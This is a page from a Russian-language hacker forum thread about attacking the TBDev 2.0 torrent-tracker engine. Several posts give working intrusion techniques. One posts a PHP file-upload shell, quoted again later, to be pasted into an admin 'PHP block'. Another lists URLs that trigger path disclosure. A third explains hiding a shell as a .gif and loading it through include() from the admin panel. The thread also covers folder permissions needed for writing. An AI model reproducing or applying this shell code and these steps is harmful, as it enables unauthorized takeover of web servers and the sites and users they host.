HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Веб-уязвимости
Перезагрузить страницу Трекер-движок TBDev 2.0
   
Ответ
Страница 7 из 27 « Первая < 3 4 5 6 7 8 9 10 11 17 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #61  
Старый 21.12.2008, 22:09
s_p_a_m
Участник форума
Регистрация: 08.02.2008
Сообщений: 116
С нами: 9607837

Репутация: 158
По умолчанию
через админку, создеш блок и вписываеш туда код шелла
 
Ответить с цитированием

  #62  
Старый 22.12.2008, 00:16
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию
Нет, при добавлении блока он ещё своё добавляет
 
Ответить с цитированием

  #63  
Старый 23.12.2008, 14:50
Uname-A
Познающий
Регистрация: 19.08.2008
Сообщений: 69
С нами: 9329667

Репутация: 31
По умолчанию
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
 
Ответить с цитированием

  #64  
Старый 02.01.2009, 03:25
ZonD80
Новичок
Регистрация: 29.10.2008
Сообщений: 5
С нами: 9227229

Репутация: 4
По умолчанию
Раскрытие путей:
Код:
recover.php?id[]=
email-gateway.php?id[]=
takeconfirm.php?id[]=
takeinvite.php?id[]=
topten.php?lim[]=
topten.php?type[]=
 
Ответить с цитированием

  #65  
Старый 09.01.2009, 20:35
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами: 9168511

Репутация: 214
По умолчанию
 
Ответить с цитированием

  #66  
Старый 11.01.2009, 21:10
aledain
Новичок
Регистрация: 11.01.2009
Сообщений: 1
С нами: 9121930

Репутация: 0
По умолчанию
Подскажите, пожалуйста, способ залить шелл, зайдя в админку. Способ через php-блок не катит, т.к. на папке выставлены права не позволяющие в неё писать (((
Если можно подробно.
 
Ответить с цитированием

  #67  
Старый 12.01.2009, 14:10
Arigona
Banned
Регистрация: 09.12.2008
Сообщений: 142
С нами: 9168806

Репутация: 114
По умолчанию
aledain, должны стоять права 777.

Если они не стоят как ты сказал - тебе не повезло просто...
 
Ответить с цитированием

  #68  
Старый 13.01.2009, 04:44
Red Virus
Новичок
Регистрация: 11.08.2008
Сообщений: 8
С нами: 9340988

Репутация: 7
По умолчанию
Цитата:
Сообщение от Arigona  
aledain, должны стоять права 777.

Если они не стоят как ты сказал - тебе не повезло просто...
Не обязательно 777 иногда скрипт принудительно записывает блок хоть и ругается на отсутствие прав нл это как уже упоминалось выше- как повезет
 
Ответить с цитированием

?
  #69  
Старый 13.01.2009, 17:03
pacan4ik
Новичок
Регистрация: 02.11.2008
Сообщений: 5
С нами: 9222108

Репутация: 0
По умолчанию ?
Цитата:
Сообщение от Uname-A  
Код:
$self = $_SERVER['PHP_SELF'];
$docr = $_SERVER['DOCUMENT_ROOT'];
$sern = $_SERVER['SERVER_NAME'];
$tend = "</tr></form></table><br><br><br><br>";
if (!empty($_GET['ac'])) {$ac = $_GET['ac'];}
elseif (!empty($_POST['ac'])) {$ac = $_POST['ac'];}
else {$ac = "upload";}
switch($ac) {
case "upload":
echo <<<HTML
<table>
<form enctype="multipart/form-data" action="$self" method="POST">
<input type="hidden" name="ac" value="upload">
<tr>
<input size="5" name="file" type="file"></td>
</tr>
<tr>
<td><input size="10" value="$docr/" name="path" type="text"><input type="submit" value="ОК"></td>
$tend
HTML;
if (isset($_POST['path'])){
$uploadfile = $_POST['path'].$_FILES['file']['name'];
if ($_POST['path']==""){$uploadfile = $_FILES['file']['name'];}

if (copy($_FILES['file']['tmp_name'], $uploadfile)) {
    echo "Файло  ".$_FILES['file']['name']."  загружен";
} else {
    print "Не удаётся загрузить файло. Инфа:\n";
    print_r($_FILES);
}
}
break;
}
?>
</pre>
Вот Замутил это из одного древнего шела Создаёте пихапе блок вписываете туда весь этот код Сохраняете. в нужном блоке И на указанных вами страницах будет отабражаться формачка залифки файла Найдёте эту формачку Укажите директорию, зальете.
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
 
Ответить с цитированием

  #70  
Старый 13.01.2009, 17:36
Red Virus
Новичок
Регистрация: 11.08.2008
Сообщений: 8
С нами: 9340988

Репутация: 7
По умолчанию
Цитата:
Сообщение от pacan4ik  
у меня половина кода высвечиваеться в блоке, и там 2 формы в первой выбрать файл, после выбора наживаю ентер и кидает на http://site.ru/$self
пробвал во втором окне выбрать адрес в папку с оформление все так же кидает http://site.ru/$self
что не так я делаю?
Лучше залей гифный шелл и с инклудь его с админки

Смени расширение шелла с php на gif залей на серв

в админке создай php блок и сунь туда этот код

например так

include("torrents/images/44776.gif");

потом выставляешь отображение блока на какой нить странице и вуаля на той страничке откроется шелл
Последний раз редактировалось Red Virus; 13.01.2009 в 17:41..
 
Ответить с цитированием
Ответ
Страница 7 из 27 « Первая < 3 4 5 6 7 8 9 10 11 17 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Прошивку iPhone 2.0 взломали ещё до её выхода geforse Мировые новости. Обсуждения. 1 14.07.2008 22:41
Web 2.0 выходит на государственный уровень vadim399 Мировые новости. Обсуждения. 2 12.01.2008 18:06
Проложение витых пар в городских домах Рогатый Трупоед "Железо" 11 20.09.2004 09:08



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.